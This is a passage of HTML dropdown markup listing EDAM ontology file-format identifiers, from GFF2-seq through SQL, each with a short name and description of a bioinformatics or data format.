value=\"edam:format_1938\">GFF2-seq - GFF feature file format with sequence in the header.</option>\n <option value=\"edam:format_1975\">GFF3 - Generic Feature Format version 3 (GFF3) of sequence features.</option>\n <option value=\"edam:format_1939\">GFF3-seq - GFF3 feature file format with sequence.</option>\n <option value=\"edam:format_3467\">GIF - Graphics Interchange Format.</option>\n <option value=\"edam:format_1940\">giFASTA format - FASTA sequence format including NCBI-style GIs.</option>\n <option value=\"edam:format_3822\">GML - GML (Graph Modeling Language) is a text file format supporting network data...</option>\n <option value=\"edam:format_3657\">GPML - Graphical Pathway Markup Language (GPML) is an XML format used for...</option>\n <option value=\"edam:format_3829\">GPR - GenePix Results (GPR) text file format developed by Axon Instruments that is...</option>\n <option value=\"edam:format_3617\">Graph format - Data format for graph data.</option>\n <option value=\"edam:format_3883\">GROMACS itp - GROMACS itp files (include topology) contain structure topology information,...</option>\n <option value=\"edam:format_3880\">GROMACS top - GROMACS MD package top textual files define an entire structure system...</option>\n <option value=\"edam:format_3775\">GSuite - GSuite is a tabular format for collections of genome or sequence feature...</option>\n <option value=\"edam:format_2306\">GTF - Gene Transfer Format (GTF), a restricted version of GFF.</option>\n <option value=\"edam:format_3164\">GTrack - GTrack is a generic and optimised tabular format for genome or sequence...</option>\n <option value=\"edam:format_3019\">GVF - Genome Variation Format (GVF). A GFF3-compatible format with defined header...</option>\n <option value=\"edam:format_3873\">HDF - HDF is the name of a set of file formats and libraries designed to store and...</option>\n <option value=\"edam:format_3590\">HDF5 - HDF5 is a data model, library, and file format for storing and managing...</option>\n <option value=\"edam:format_1941\">hennig86 - Hennig86 output sequence format.</option>\n <option value=\"edam:format_1705\">HET group dictionary entry format - The format of an entry from the HET group dictionary (HET groups from PDB...</option>\n <option value=\"edam:format_2072\">Hidden Markov model format - Format of a hidden Markov model.</option>\n <option value=\"edam:format_2075\">HMM emission and transition counts format - Data format for the emission and transition counts of a hidden Markov model.</option>\n <option value=\"edam:format_1349\">HMMER Dirichlet prior - Dirichlet distribution HMMER format.</option>\n <option value=\"edam:format_1351\">HMMER emission and transition - Format of a report from the HMMER package on the emission and transition...</option>\n <option value=\"edam:format_1370\">HMMER format - Format of a hidden Markov model representation used by the HMMER package.</option>\n <option value=\"edam:format_1422\">HMMER profile alignment (HMM versus sequences) - Format used by the HMMER package for of an alignment of a hidden Markov...</option>\n <option value=\"edam:format_1421\">HMMER profile alignment (sequences versus HMMs) - Format used by the HMMER package for an alignment of a sequence against a...</option>\n <option value=\"edam:format_1391\">HMMER-aln - FASTA-style format for multiple sequences aligned by HMMER package to an HMM.</option>\n <option value=\"edam:format_3328\">HMMER2 - HMMER profile HMM file for HMMER versions 2.x</option>\n <option value=\"edam:format_3329\">HMMER3 - HMMER profile HMM file for HMMER versions 3.x</option>\n <option value=\"edam:format_3845\">HSAML - An alignment format generated by PRANK/PRANKSTER consisting of four...</option>\n <option value=\"edam:format_1455\">hssp - Entry format of the HSSP database (Homology-derived Secondary Structure in...</option>\n <option value=\"edam:format_2331\">HTML - HTML format.</option>\n <option value=\"edam:format_3839\">ibd - ibd is a data format for mass spectrometry imaging data.</option>\n <option value=\"edam:format_3578\">IDAT - Proprietary file format for (raw) BeadArray data used by genomewide...</option>\n <option value=\"edam:format_3764\">idXML - XML file format for files containing information about peptide...</option>\n <option value=\"edam:format_1942\">ig - Intelligenetics sequence format.</option>\n <option value=\"edam:format_1943\">igstrict - Intelligenetics sequence format (strict version).</option>\n <option value=\"edam:format_1740\">iHOP format - The format of iHOP (Information Hyperlinked over Proteins) text-mining...</option>\n <option value=\"edam:format_3593\">im - IM is a format used by LabEye and other applications based on the IFUNC...</option>\n <option value=\"edam:format_3547\">Image format - Format used for images and image metadata.</option>\n <option value=\"edam:format_3682\">imzML metadata file - imzML metadata is a data format for mass spectrometry imaging metadata.</option>\n <option value=\"edam:format_1197\">InChI - Chemical structure specified in IUPAC International Chemical Identifier...</option>\n <option value=\"edam:format_1199\">InChIKey - The InChIKey (hashed InChI) is a fixed length (25 character) condensed...</option>\n <option value=\"edam:format_3287\">Individual genetic data format - Data format for a metadata on an individual and their genetic data.</option>\n <option value=\"edam:format_2185\">insdxml - XML format for EMBL entries.</option>\n <option value=\"edam:format_1341\">InterPro hits format - Results format for searches of the InterPro database.</option>\n <option value=\"edam:format_1343\">InterPro match table format - Format of results of a search of the InterPro database showing matches...</option>\n <option value=\"edam:format_1342\">InterPro protein view report format - Format of results of a search of the InterPro database showing matches of...</option>\n <option value=\"edam:format_3846\">InterProScan XML - Output xml file from the InterProScan sequence analysis application.</option>\n <option value=\"edam:format_3687\">ISA-TAB - The Investigation / Study / Assay (ISA) tab-delimited (TAB) format...</option>\n <option value=\"edam:format_1944\">jackknifer - Jackknifer interleaved and non-interleaved sequence format.</option>\n <option value=\"edam:format_1970\">jackknifernon - Jackknifer output sequence non-interleaved format.</option>\n <option value=\"edam:format_1367\">JASPAR format - A profile (sequence classifier) in the format used in the JASPAR database.</option>\n <option value=\"edam:format_3859\">JCAMP-DX - A standardized file format for data exchange in mass spectrometry, initially...</option>\n <option value=\"edam:format_3579\">JPG - Joint Picture Group file format for lossy graphics file.</option>\n <option value=\"edam:format_3464\">JSON - JavaScript Object Notation format; a lightweight, text-based format to...</option>\n <option value=\"edam:format_3749\">JSON-LD - JSON-LD, or JavaScript Object Notation for Linked Data, is a method of...</option>\n <option value=\"edam:format_3665\">K-mer countgraph - A list of k-mers and their occurences in a dataset. Can also be used as an...</option>\n <option value=\"edam:format_3847\">KGML - The KEGG Markup Language (KGML) is an exchange format of the KEGG pathway...</option>\n <option value=\"edam:format_3765\">KNIME datatable format - Data table formatted such that it can be passed/streamed within the KNIME...</option>\n <option value=\"edam:format_3254\">KRSS2 Syntax - A superset of the Description-Logic Knowledge Representation System...</option>\n <option value=\"edam:format_3817\">latex - format for the LaTeX document preparation system</option>\n <option value=\"edam:format_3014\">LAV - LAV format of alignments generated by BLASTZ and LASTZ.</option>\n <option value=\"edam:format_1337\">lhf - Format of EMBASSY ligand hits file (LHF) of database hits (sequences) with...</option>\n <option value=\"edam:format_3748\">Linked data format - A linked data format enables publishing structured data as linked data...</option>\n <option value=\"edam:format_3728\">LocARNA PP - The LocARNA PP format combines sequence or alignment information and...</option>\n <option value=\"edam:format_3913\">Loom - The Loom file format is based on HDF5, a standard for storing large...</option>\n <option value=\"edam:format_3008\">MAF - Multiple Alignment Format (MAF) supporting alignments of whole genomes with...</option>\n <option value=\"edam:format_3161\">MAGE-ML - MAGE-ML XML format for microarray expression data, standardised by MGED (now...</option>\n <option value=\"edam:format_3162\">MAGE-TAB - MAGE-TAB textual format for microarray expression data, standardised by MGED...</option>\n <option value=\"edam:format_3253\">Manchester OWL Syntax - A syntax for writing OWL class expressions.</option>\n <option value=\"edam:format_3285\">MAP - The MAP file describes SNPs and is used by the Plink package.</option>\n <option value=\"edam:format_2060\">Map format - Format of a map of (typically one) molecular sequence annotated with...</option>\n <option value=\"edam:format_1985\">markx0 - Pearson MARKX0 alignment format.</option>\n <option value=\"edam:format_2922\">markx0 variant - Some variant of Pearson MARKX alignment format.</option>\n <option value=\"edam:format_1986\">markx1 - Pearson MARKX1 alignment format.</option>\n <option value=\"edam:format_1987\">markx10 - Pearson MARKX10 alignment format.</option>\n <option value=\"edam:format_1988\">markx2 - Pearson MARKX2 alignment format.</option>\n <option value=\"edam:format_1989\">markx3 - Pearson MARKX3 alignment format.</option>\n <option value=\"edam:format_3713\">Mascot .dat file - Raw result file from Mascot database search.</option>\n <option value=\"edam:format_1945\">mase format - Mase program sequence format.</option>\n <option value=\"edam:format_3245\">Mass spectrometry data format - Format for mass pectra and derived data, include peptide sequences etc.</option>\n <option value=\"edam:format_3626\">MAT - Binary format used by MATLAB files to store workspace variables.</option>\n <option value=\"edam:format_1990\">match - Alignment format for start and end of matches between sequence pairs.</option>\n <option value=\"edam:format_3033\">Matrix format - Format of a matrix (array) of numerical values.</option>\n <option value=\"edam:format_3714\">MaxQuant APL peaklist format - Format of peak list files from Andromeda search engine (MaxQuant) that...</option>\n <option value=\"edam:format_3777\">MCPD - The FAO/Bioversity/IPGRI Multi-Crop Passport Descriptors (MCPD) is an...</option>\n <option value=\"edam:format_3878\">mdcrd - AMBER trajectory (also called mdcrd), with 10 coordinates per line and...</option>\n <option value=\"edam:format_2194\">medline - Abstract format used by MedLine database.</option>\n <option value=\"edam:format_1735\">Medline Display Format - Format for abstracts of scientific articles from the Medline database.</option>\n <option value=\"edam:format_1991\">mega - Mega format for (typically aligned) sequences.</option>\n <option value=\"edam:format_2923\">mega variant - Some variant of Mega format for (typically aligned) sequences.</option>\n <option value=\"edam:format_1946\">mega-seq - Mega interleaved and non-interleaved sequence format.</option>\n <option value=\"edam:format_1992\">meganon - Mega non-interleaved format for (typically aligned) sequences.</option>\n <option value=\"edam:format_1369\">MEME background Markov model - Format of the model of random sequences used by MEME.</option>\n <option value=\"edam:format_1350\">MEME Dirichlet prior - Dirichlet distribution MEME format.</option>\n <option value=\"edam:format_1360\">meme-motif - A motif in the format generated by the MEME program.</option>\n <option value=\"edam:format_1198\">mf - Chemical structure specified by Molecular Formula (MF), including a count of...</option>\n <option value=\"edam:format_3651\">MGF - Mascot Generic Format. Encodes multiple MS/MS spectra in a single file.</option>\n <option value=\"edam:format_3550\">mhd - Text-based tagged file format for medical images generated using the...</option>\n <option value=\"edam:format_3556\">MHTML - MIME HTML format for Web pages, which can include external resources,...</option>\n <option value=\"edam:format_2056\">Microarray experiment data format - Format for information about a microarray experimental per se (not the data...</option>\n <option value=\"edam:format_1629\">mira - Format of MIRA sequence trace information file.</option>\n <option value=\"edam:format_3864\">mirGFF3 - mirGFF3 is a common format for microRNA data resulting from small-RNA...</option>\n <option value=\"edam:format_1477\">mmCIF - Entry format of PDB database in mmCIF format.</option>\n <option value=\"edam:format_3816\">Mol2 - Complete, portable representation of a SYBYL molecule. ASCII file which...</option>\n <option value=\"edam:format_3815\">Molfile - An MDL Molfile is a file format for holding information about the atoms,...</option>\n <option value=\"edam:format_3849\">MSAML - A set of XML compliant markup components for describing multiple sequence...</option>\n <option value=\"edam:format_3702\">MSF - Proprietary mass-spectrometry format of Thermo Scientific's...</option>\n <option value=\"edam:format_3911\">msh - Mash sketch is a format for sequence / sequence checksum information. To...</option>\n <option value=\"edam:format_1334\">mspcrunch - Format of results of a sequence database search using some variant of...</option>\n <option value=\"edam:format_3916\">MTX - The Matrix Market matrix (MTX) format stores numerical or pattern matrices...</option>\n <option value=\"edam:format_3834\">mzData - Now deprecated data format of the HUPO Proteomics Standards Initiative. ...</option>\n <option value=\"edam:format_3247\">mzIdentML - mzIdentML is the exchange format for peptides and proteins identified from...</option>\n <option value=\"edam:format_3244\">mzML - mzML format for raw spectrometer output data, standardised by HUPO PSI MSS.</option>\n <option value=\"edam:format_3248\">mzQuantML - mzQuantML is the format for quantitation values associated with peptides,...</option>\n <option value=\"edam:format_3681\">mzTab - mzTab is a tab-delimited format for mass spectrometry-based proteomics and...</option>\n <option value=\"edam:format_3654\">mzXML - Common file format for proteomics mass spectrometric data developed at the...</option>\n <option value=\"edam:format_3256\">N-Triples - A plain text serialisation format for RDF (Resource Description Framework)...</option>\n <option value=\"edam:format_1948\">nbrf/pir - NBRF/PIR entry sequence format.</option>\n <option value=\"edam:format_1972\">NCBI format - NCBI FASTA sequence format with NCBI-style IDs.</option>\n <option value=\"edam:format_3650\">netCDF - Format used by netCDF software library for writing and reading...</option>\n <option value=\"edam:format_1910\">newick - Phylogenetic tree Newick (text) format.</option>\n <option value=\"edam:format_3160\">NeXML - NeXML is a standardised XML format for rich phyloinformatic data.</option>\n <option value=\"edam:format_1912\">Nexus format - Phylogenetic tree Nexus (text) format.</option>\n <option value=\"edam:format_1949\">nexus-seq - Nexus/paup interleaved sequence format.</option>\n <option value=\"edam:format_1973\">nexusnon - Nexus/paup non-interleaved sequence format.</option>\n <option value=\"edam:format_3549\">nii - Medical image and metadata format of the Neuroimaging Informatics Technology...</option>\n <option value=\"edam:format_3862\">NLP annotation format - An NLP format used for annotated textual documents.</option>\n <option value=\"edam:format_3863\">NLP corpus format - NLP format used by a specific type of corpus (collection of texts).</option>\n <option value=\"edam:format_3841\">NLP format - Data format used in Natural Language Processing.</option>\n <option value=\"edam:format_3824\">NMR data format - Data format for raw data from a nuclear magnetic resonance (NMR)...</option>\n <option value=\"edam:format_3906\">NMReDATA - MReData is a text based data standard for processed NMR data. It is relying...</option>\n <option value=\"edam:format_3825\">nmrML - nmrML is an MSI supported XML-based open access format for metabolomics NMR...</option>\n <option value=\"edam:format_3257\">Notation3 - A shorthand non-XML serialisation of Resource Description Framework model,...</option>\n <option value=\"edam:format_3551\">nrrd - Nearly Raw Rasta Data format designed to support scientific visualisation...</option>\n <option value=\"edam:format_2061\">Nucleic acid features (primers) format - Format of a report on PCR primers or hybridisation oligos in a nucleic acid...</option>\n <option value=\"edam:format_2158\">Nucleic acid features (restriction sites) format - Format used for report on restriction enzyme recognition sites in nucleotide...</option>\n <option value=\"edam:format_1207\">nucleotide - Alphabet for a nucleotide sequence with possible ambiguity, unknown...</option>\n <option value=\"edam:format_2549\">OBO - OBO ontology text format.</option>\n <option value=\"edam:format_2196\">OBO format - A serialisation format conforming to the Open Biomedical Ontologies (OBO)...</option>\n <option value=\"edam:format_2550\">OBO-XML - OBO ontology XML format.</option>\n <option value=\"edam:format_3727\">OME-TIFF - Image file format used by the Open Microscopy Environment (OME).</option>\n <option value=\"edam:format_2195\">Ontology format - Format used for ontologies.</option>\n <option value=\"edam:format_3784\">Open Annotation format - A format of text annotation using the linked-data Open Annotation Data...</option>\n <option value=\"edam:format_3850\">OrthoXML - OrthoXML is designed broadly to allow the storage and comparison of...</option>\n <option value=\"edam:format_1741\">OSCAR format - OSCAR format of annotated chemical text.</option>\n <option value=\"edam:format_2197\">OWL format - A serialisation format conforming to the Web Ontology Language (OWL) model.</option>\n <option value=\"edam:format_3252\">OWL Functional Syntax - A human-readable encoding for the Web Ontology Language (OWL).</option>\n <option value=\"edam:format_3262\">OWL/XML - OWL ontology XML serialisation format.</option>\n <option value=\"edam:format_1996\">pair - EMBOSS simple sequence pair alignment format.</option>\n <option value=\"edam:format_3601\">pbm - The PBM format is a lowest common denominator monochrome file format. It...</option>\n <option value=\"edam:format_3874\">PCAzip - PCAZip format is a binary compressed file to store atom coordinates based on...</option>\n <option value=\"edam:format_3594\">pcd - Photo CD format, which is the highest resolution format for images on a CD.</option>\n <option value=\"edam:format_1551\">Pcons report format - Format of output of the Pcons Model Quality Assessment Program (MQAP).</option>\n <option value=\"edam:format_3595\">pcx - PCX is an image file format that uses a simple form of run-length encoding....</option>\n <option value=\"edam:format_1476\">PDB - Entry format of PDB database in PDB format.</option>\n <option value=\"edam:format_1475\">PDB database entry format - Format of an entry (or part of an entry) from the PDB database.</option>\n <option value=\"edam:format_1950\">pdbatom - PDB sequence format (ATOM lines).</option>\n <option value=\"edam:format_1951\">pdbatomnuc - PDB nucleotide sequence format (ATOM lines).</option>\n <option value=\"edam:format_1478\">PDBML - Entry format of PDB database in PDBML (XML) format.</option>\n <option value=\"edam:format_1953\">pdbseqres - PDB sequence format (SEQRES lines).</option>\n <option value=\"edam:format_1952\">pdbseqresnuc - PDB nucleotide sequence format (SEQRES lines).</option>\n <option value=\"edam:format_3508\">PDF - Portable Document Format</option>\n <option value=\"edam:format_1954\">Pearson format - Plain old FASTA sequence format (unspecified format for IDs).</option>\n <option value=\"edam:format_3286\">PED - The PED file describes individuals and genetic data and is used by the Plink...</option>\n <option value=\"edam:format_3288\">PED/MAP - The PED/MAP file describes data used by the Plink package.</option>\n <option value=\"edam:format_3655\">pepXML - Open data format for the storage, exchange, and processing of peptide...</option>\n <option value=\"edam:format_3602\">pgm - The PGM format is a lowest common denominator grayscale file format.</option>\n <option value=\"edam:format_3012\">pgSnp - Personal Genome SNP (pgSnp) format for sequence variation tracks (indels and...</option>\n <option value=\"edam:format_1633\">PHD - PHD sequence trace format to store serialised chromatogram data (reads).</option>\n <option value=\"edam:format_1432\">Phylip character frequencies format - PHYLIP file format for phylogenetics character frequency data.</option>\n <option value=\"edam:format_1434\">Phylip cliques format - Format of PHYLIP cliques data.</option>\n <option value=\"edam:format_1430\">Phylip continuous quantitative characters - PHYLIP file format for continuous quantitative character data.</option>\n <option value=\"edam:format_1433\">Phylip discrete states format - Format of PHYLIP discrete states data.</option>\n <option value=\"edam:format_1423\">Phylip distance matrix - Format of PHYLIP phylogenetic distance matrix data.</option>\n <option value=\"edam:format_1997\">PHYLIP format - Phylip format for (aligned) sequences.</option>\n <option value=\"edam:format_2924\">Phylip format variant - Some variant of Phylip format for (aligned) sequences.</option>\n <option value=\"edam:format_1998\">PHYLIP sequential - Phylip non-interleaved format for (aligned) sequences.</option>\n <option value=\"edam:format_1445\">Phylip tree distance format - Format for distances, such as Branch Score distance, between two or more...</option>\n <option value=\"edam:format_1435\">Phylip tree format - Phylogenetic tree data format used by the PHYLIP program.</option>\n <option value=\"edam:format_1425\">Phylip tree raw - Raw data file format used by Phylip from which a phylogenetic tree is...</option>\n <option value=\"edam:format_2036\">Phylogenetic character data format - Format of raw (unplotted) phylogenetic data.</option>\n <option value=\"edam:format_2037\">Phylogenetic continuous quantitative character format - Format of phylogenetic continuous quantitative character data.</option>\n <option value=\"edam:format_2038\">Phylogenetic discrete states format - Format of phylogenetic discrete states data.</option>\n <option value=\"edam:format_2006\">Phylogenetic tree format - Data format for a phylogenetic tree.</option>\n <option value=\"edam:format_2556\">Phylogenetic tree format (text) - Text format for a phylogenetic tree.</option>\n <option value=\"edam:format_2557\">Phylogenetic tree format (XML) - XML format for a phylogenetic tree.</option>\n <option value=\"edam:format_2039\">Phylogenetic tree report (cliques) format - Format of phylogenetic cliques data.</option>\n <option value=\"edam:format_2040\">Phylogenetic tree report (invariants) format - Format of phylogenetic invariants data.</option>\n <option value=\"edam:format_2049\">Phylogenetic tree report (tree distances) format - Format for phylogenetic tree distance data.</option>\n <option value=\"edam:format_3159\">phyloXML - phyloXML is a standardised XML format for phylogenetic trees, networks, and...</option>\n <option value=\"edam:format_3015\">Pileup - Pileup format of alignment of sequences (e.g. sequencing reads) to (a)...</option>\n <option value=\"edam:format_3653\">pkl - Spectral data file similar to dta.</option>\n <option value=\"edam:format_1964\">plain text format (unformatted) - Plain text sequence format (essentially unformatted).</option>\n <option value=\"edam:format_1861\">PlasMapper TextMap - Map of a plasmid (circular DNA) in PlasMapper TextMap format.</option>\n <option value=\"edam:format_1739\">pmc - Article format of the PubMed Central database.</option>\n <option value=\"edam:format_3726\">PMML - PMML uses XML to represent mining models. The structure of the models is...</option>\n <option value=\"edam:format_3603\">PNG - PNG is a file format for image compression.</option>\n <option value=\"edam:format_3330\">PO - EMBOSS simple sequence pair alignment format.</option>\n <option value=\"edam:format_3596\">ppm - The PPM format is a lowest common denominator color image file format.</option>\n <option value=\"edam:format_3838\">pptx - Microsoft Powerpoint format.</option>\n <option value=\"edam:format_3684\">PRIDE XML - PRIDE XML is an XML format for mass spectra, peptide and protein...</option>\n <option value=\"edam:format_1627\">Primer3 primer - Report format on PCR primers and hybridisation oligos as generated by...</option>\n <option value=\"edam:format_3826\">proBAM - . proBAM is an adaptation of BAM (format_2572), which was extended to meet...</option>\n <option value=\"edam:format_3827\">proBED - . proBED is an adaptation of BED (format_3003), which was extended to meet...</option>\n <option value=\"edam:format_1552\">ProQ report format - Format of output of the ProQ protein model quality predictor.</option>\n <option value=\"edam:format_1356\">prosite-pattern - Format of a regular expression pattern from the Prosite database.</option>\n <option value=\"edam:format_1366\">prosite-profile - Sequence profile (sequence classifier) format used in the PROSITE database.</option>\n <option value=\"edam:format_1208\">protein - Alphabet for a protein sequence with possible ambiguity, unknown positions...</option>\n <option value=\"edam:format_3097\">Protein domain classification format - Format of data concerning the classification of the sequences and/or...</option>\n <option value=\"edam:format_2052\">Protein family report format - Format for reports on a protein family.</option>\n <option value=\"edam:format_2054\">Protein interaction format - Format for molecular interaction data.</option>\n <option value=\"edam:format_2062\">Protein report format - Format of a report of general information about a specific protein.</option>\n <option value=\"edam:format_2077\">Protein secondary structure format - Format for secondary structure (predicted or real) of a protein molecule.</option>\n <option value=\"edam:format_2065\">Protein structure report (quality evaluation) format - Format of a report on the quality of a protein three-dimensional model.</option>\n <option value=\"edam:format_3747\">protXML - A format for storage, exchange, and processing of protein identifications...</option>\n <option value=\"edam:format_3696\">PS - PostScript format</option>\n <option value=\"edam:format_3597\">psd - PSD (Photoshop Document) is a proprietary file that allows the user to work...</option>\n <option value=\"edam:format_3851\">PSDML - Tree structure of Protein Sequence Database Markup Language generated using...</option>\n <option value=\"edam:format_3882\">PSF - X-Plor Protein Structure Files (PSF) are structure topology files used by...</option>\n <option value=\"edam:format_3242\">PSI MI TAB (MITAB) - Tabular Molecular Interaction format (MITAB), standardised by HUPO PSI MI.</option>\n <option value=\"edam:format_3158\">PSI MI XML (MIF) - XML Molecular Interaction Format (MIF), standardised by HUPO PSI MI.</option>\n <option value=\"edam:format_3243\">PSI-PAR - Protein affinity format (PSI-PAR), standardised by HUPO PSI MI. It is...</option>\n <option value=\"edam:format_3007\">PSL - PSL format of alignments, typically generated by BLAT or psLayout. Can be...</option>\n <option value=\"edam:format_3781\">PubAnnotation format - JSON format of annotated scientific text used by PubAnnotations and other...</option>\n <option value=\"edam:format_1734\">PubMed citation - Format of bibliographic reference as used by the PubMed database.</option>\n <option value=\"edam:format_3848\">PubMed XML - XML format for collected entries from biobliographic databases MEDLINE and...</option>\n <option value=\"edam:format_3783\">PubTator format - Native textual export format of annotated scientific text from PubTator.</option>\n <option value=\"edam:format_2094\">pure - Alphabet for molecular sequence with possible unknown positions but without...</option>\n <option value=\"edam:format_1215\">pure dna - Alphabet for a DNA sequence with possible ambiguity and unknown positions...</option>\n <option value=\"edam:format_1210\">pure nucleotide - Alphabet for a nucleotide sequence with possible ambiguity and unknown...</option>\n <option value=\"edam:format_1219\">pure protein - Alphabet for any protein sequence with possible ambiguity and unknown...</option>\n <option value=\"edam:format_1217\">pure rna - Alphabet for an RNA sequence with possible ambiguity and unknown positions...</option>\n <option value=\"edam:format_3683\">qcML - qcML is an XML format for quality-related data of mass spectrometry and...</option>\n <option value=\"edam:format_3607\">qual - FASTQ format subset for Phred sequencing quality score data only (no...</option>\n <option value=\"edam:format_3611\">qual454 - FASTQ format subset for Phred sequencing quality score data only (no...</option>\n <option value=\"edam:format_3609\">qualillumina - FASTQ format subset for Phred sequencing quality score data only (no...</option>\n <option value=\"edam:format_3608\">qualsolexa - FASTQ format subset for Phred sequencing quality score data only (no...</option>\n <option value=\"edam:format_3610\">qualsolid - FASTQ format subset for Phred sequencing quality score data only (no...</option>\n <option value=\"edam:format_3787\">Query language - A query language (format) for structured database queries.</option>\n <option value=\"edam:format_1295\">quicktandem - Report format for tandem repeats in a nucleotide sequence (format generated...</option>\n <option value=\"edam:format_3554\">R file format - File format used for scripts written in the R programming language for...</option>\n <option value=\"edam:format_3605\">rast - Sun Raster is a raster graphics file format used on SunOS by Sun Microsystems</option>\n <option value=\"edam:format_1957\">raw - Raw sequence format with no non-sequence characters.</option>\n <option value=\"edam:format_3099\">Raw CATH domain classification format - Format of raw CATH domain classification data files.</option>\n <option value=\"edam:format_3828\">Raw microarray data format - Data format for raw microarray data.</option>\n <option value=\"edam:format_3098\">Raw SCOP domain classification format - Format of raw SCOP domain classification data files.</option>\n <option value=\"edam:format_2571\">Raw sequence format - Format of a raw molecular sequence (i.e. the alphabet used).</option>\n <option value=\"edam:format_3580\">rcc - Reporter Code Count-A data file (.csv) output by the Nanostring nCounter...</option>\n <option value=\"edam:format_2376\">RDF format - A serialisation format conforming to the Resource Description Framework...</option>\n <option value=\"edam:format_3261\">RDF/XML - Resource Description Framework (RDF) XML format.</option>\n <option value=\"edam:format_1320\">REBASE restriction sites - Report format for restriction enzyme recognition sites used by REBASE...</option>\n <option value=\"edam:format_1958\">refseqp - Refseq protein entry sequence format.</option>\n <option value=\"edam:format_3819\">Relaxed PHYLIP Interleaved - Phylip multiple alignment sequence format, less stringent than PHYLIP format.</option>\n <option value=\"edam:format_3820\">Relaxed PHYLIP Sequential - Phylip multiple alignment sequence format, less stringent than PHYLIP...</option>\n <option value=\"edam:format_1319\">restover format - Report format for restriction enzyme recognition sites used by EMBOSS...</option>\n <option value=\"edam:format_1318\">restrict format - Report format for restriction enzyme recognition sites used by EMBOSS...</option>\n <option value=\"edam:format_3600\">rgb - RGB file format is the native raster graphics file format for Silicon...</option>\n <option value=\"edam:format_1213\">rna - Alphabet for an RNA sequence with possible ambiguity, unknown positions and...</option>\n <option value=\"edam:format_3865\">RNA annotation format - A placeholder concept for formats of annotated RNA data, including e.g....</option>\n <option value=\"edam:format_2076\">RNA secondary structure format - Format for secondary structure (predicted or real) of an RNA molecule.</option>\n <option value=\"edam:format_3311\">RNAML - RNA Markup Language.</option>\n <option value=\"edam:format_3485\">RSF - Rich sequence format.</option>\n <option value=\"edam:format_3886\">RST - AMBER coordinate/restart file with 6 coordinates per line and decimal format...</option>\n <option value=\"edam:format_2573\">SAM - Sequence Alignment/Map (SAM) format for alignment of nucleotide sequences...</option>\n <option value=\"edam:format_3813\">SAMPLE file format - The SAMPLE file format contains information about each individual i.e....</option>\n <option value=\"edam:format_1296\">Sanger inverted repeats - Report format for inverted repeats in a nucleotide sequence (format...</option>\n <option value=\"edam:format_3692\">SBGN-ML - SBGN-ML is an XML format for Systems Biology Graphical Notation (SBGN)...</option>\n <option value=\"edam:format_2585\">SBML - Systems Biology Markup Language (SBML), the standard XML format for models...</option>\n <option value=\"edam:format_3725\">SBOL - Synthetic Biology Open Language (SBOL) is an XML format for the...</option>\n <option value=\"edam:format_3155\">SBRML - Systems Biology Result Markup Language (SBRML), the standard XML format for...</option>\n <option value=\"edam:format_3688\">SBtab - SBtab is a tabular format for biochemical network models.</option>\n <option value=\"edam:format_1632\">SCF - Staden Chromatogram Files format (SCF) of base-called sequence reads,...</option>\n <option value=\"edam:format_1999\">scores format - Alignment format for score values for pairs of sequences.</option>\n <option value=\"edam:format_3814\">SDF - SDF is one of a family of chemical-data file formats developed by MDL...</option>\n <option value=\"edam:format_3685\">SED-ML - Simulation Experiment Description Markup Language (SED-ML) is an XML format...</option>\n <option value=\"edam:format_2000\">selex - SELEX format for (aligned) sequences.</option>\n <option value=\"edam:format_2919\">Sequence annotation track format - Format of a sequence annotation track.</option>\n <option value=\"edam:format_2055\">Sequence assembly format - Format for sequence assembly data.</option>\n <option value=\"edam:format_2561\">Sequence assembly format (text) - Text format for sequence assembly data.</option>\n <option value=\"edam:format_2170\">Sequence cluster format - Format used for clusters of molecular sequences.</option>\n <option value=\"edam:format_2172\">Sequence cluster format (nucleic acid) - Format used for clusters of nucleotide sequences.</option>\n <option value=\"edam:format_2171\">Sequence cluster format (protein) - Format used for clusters of protein sequences.</option>\n <option value=\"edam:format_2067\">Sequence distance matrix format - Format of a matrix of genetic distances between molecular sequences.</option>\n <option value=\"edam:format_1920\">Sequence feature annotation format - Data format for molecular sequence feature information.</option>\n <option value=\"edam:format_2548\">Sequence feature table format - Format for a sequence feature table.</option>\n <option value=\"edam:format_2206\">Sequence feature table format (text) - Text format for a sequence feature table.</option>\n <option value=\"edam:format_2553\">Sequence feature table format (XML) - XML format for a sequence feature table.</option>\n <option value=\"edam:format_2155\">Sequence features (repeats) format - Format used for map of repeats in molecular (typically nucleotide) sequences.</option>\n <option value=\"edam:format_2068\">Sequence motif format - Format of a sequence motif.</option>\n <option value=\"edam:format_2069\">Sequence profile format - Format of a sequence profile.</option>\n <option value=\"edam:format_3606\">Sequence quality report format (text) - Textual report format for sequence quality for reports from sequencing...</option>\n <option value=\"edam:format_2078\">Sequence range format - Format used to specify range(s) of sequence positions.</option>\n <option value=\"edam:format_1919\">Sequence record format - Data format for a molecular sequence record.</option>\n <option value=\"edam:format_2551\">Sequence record format (text) - Data format for a molecular sequence record.</option>\n <option value=\"edam:format_2552\">Sequence record format (XML) - Data format for a molecular sequence record.</option>\n <option value=\"edam:format_2057\">Sequence trace format - Format for sequence trace data (i.e. including base call information).</option>\n <option value=\"edam:format_2921\">Sequence variation annotation format - Format of sequence variation annotation.</option>\n <option value=\"edam:format_1419\">Sequence-MEME profile alignment - Format for alignment of molecular sequences to MEME profiles...</option>\n <option value=\"edam:format_2014\">Sequence-profile alignment format - Data format for a sequence-profile alignment.</option>\n <option value=\"edam:format_3758\">SEQUEST .out file - Raw result file from SEQUEST database search.</option>\n <option value=\"edam:format_3701\">Sequin format - A five-column, tab-delimited table of feature locations and qualifiers for...</option>\n <option value=\"edam:format_3852\">SeqXML - SeqXML is an XML Schema to describe biological sequences, developed by the...</option>\n <option value=\"edam:format_3284\">SFF - Standard flowgram format (SFF) is a binary file format used to encode...</option>\n <option value=\"edam:format_3619\">sif - SIF (simple interaction file) Format - a network/pathway format used for...</option>\n <option value=\"edam:format_1200\">smarts - SMILES ARbitrary Target Specification (SMARTS) format for chemical structure...</option>\n <option value=\"edam:format_1196\">SMILES - Chemical structure specified in Simplified Molecular Input Line Entry System...</option>\n <option value=\"edam:format_1335\">Smith-Waterman format - Format of results of a sequence database search using some variant of Smith...</option>\n <option value=\"edam:format_3624\">snpeffdb - An index of a genome database, indexed for use by the snpeff tool.</option>\n <option value=\"edam:format_3790\">SPARQL - SPARQL (SPARQL Protocol and RDF Query Language) is a semantic query language...</option>\n <option value=\"edam:format_3250\">spML - spML is the format for describing proteomics sample processing, other than...</option>\n <option value=\"edam:format_3555\">SPSS - File format used for scripts for the Statistical Package for the Social...</option>\n <option value=\"edam:format_3788\">SQL - SQL (Structured Query Language) is the de-facto standard query language...</option>\n <option 